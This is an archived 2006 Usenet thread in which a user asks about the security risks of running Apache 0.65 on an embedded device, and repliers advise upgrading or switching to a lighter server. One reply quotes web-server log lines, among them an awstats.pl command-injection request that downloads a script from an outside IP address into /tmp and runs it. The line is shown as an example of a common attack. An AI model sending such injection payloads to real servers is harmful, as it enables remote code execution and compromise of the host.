f



Risks with very old Apache version

Hello,

I have created a program that can be manged by a webbrowser.
Because this device has only a small pice of memory I have lookd up a very
old apache webserver to run on this device.

I have installed apache 0.65.
This works great, but I have one question. What are the risks involved
running this version?? how can somebody crash this version off apache??
people can only look at the websites, they can't run there own html code.

thank you all!
chiel



0
chiel
2/2/2006 1:05:08 AM
comp.os.linux.development.apps 5216 articles. 1 followers. Post Follow

3 Replies
3033 Views

Similar Articles

[PageSpeed] 6

On a sunny day (Thu, 2 Feb 2006 02:05:08 +0100) it happened "chiel"
<chiel@gmx.net> wrote in <2b54b$43e15ac0$d55d5e77$5031@news.chello.nl>:

>Hello,
>
>I have created a program that can be manged by a webbrowser.
>Because this device has only a small pice of memory I have lookd up a very
>old apache webserver to run on this device.
>
>I have installed apache 0.65.
>This works great, but I have one question. What are the risks involved
>running this version?? how can somebody crash this version off apache??
>people can only look at the websites, they can't run there own html code.
>
>thank you all!
>chiel
Not sure if tha tversiosn security is broken, but people can send all sorts of
shit in a HTTP request:
That could cause buffer overflows and possibly execute some code.
You need to read the Apache info pages.
And make sure your http.conf file prohibits anything you do noyt want,
like listing directories perhaps.
(Not sure  0.5 had a http.conf ..), also make sure they cannot use it
to forward to an other url, like this:
For example this:
66.232.140.73 - - [30/Jan/2006:14:16:20 +0100] "GET http://www.szlanna.com/prxjdg.cgi?ja HTTP/1.0" 403 274
should give a 403
There is the common attack these days:
aamiens-151-1-99-228.w86-198.abo.wanadoo.fr - - [30/Jan/2006:03:19:48 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 899
This person likely does not even know their PC is infected.
Will you apache handle this?
Telnet hostname 80 and try...
0
Me
2/2/2006 12:48:58 PM
chiel wrote:
> I have installed apache 0.65.
> This works great, but I have one question. What are the risks involved
> running this version?? how can somebody crash this version off apache??

The first version of Apache with a vulnerability in bugtraq I found was
Apache 0.8. The first bug in Gnats on the Apache website is for Apache
1.2. When Apache 0.65 came out, there were no script kiddies or
spammers, so it is likely that there are some vulnerabilities in there.
If you feel like it, you can test it and fix them. However, you are
probably better off with something which is more recent and still
supported, like http://www.lighttpd.net/.

0
Sjoerd
2/2/2006 6:19:15 PM
In article <2b54b$43e15ac0$d55d5e77$5031@news.chello.nl>,
chiel <chiel@gmx.net> wrote:

>I have created a program that can be manged by a webbrowser.
>Because this device has only a small pice of memory I have lookd up a very
>old apache webserver to run on this device.

Why use apache? There are other servers around that are
designed for embedded use.

--
http://www.spinics.net/lists/vfl/

0
ellis
2/2/2006 9:41:45 PM
Reply: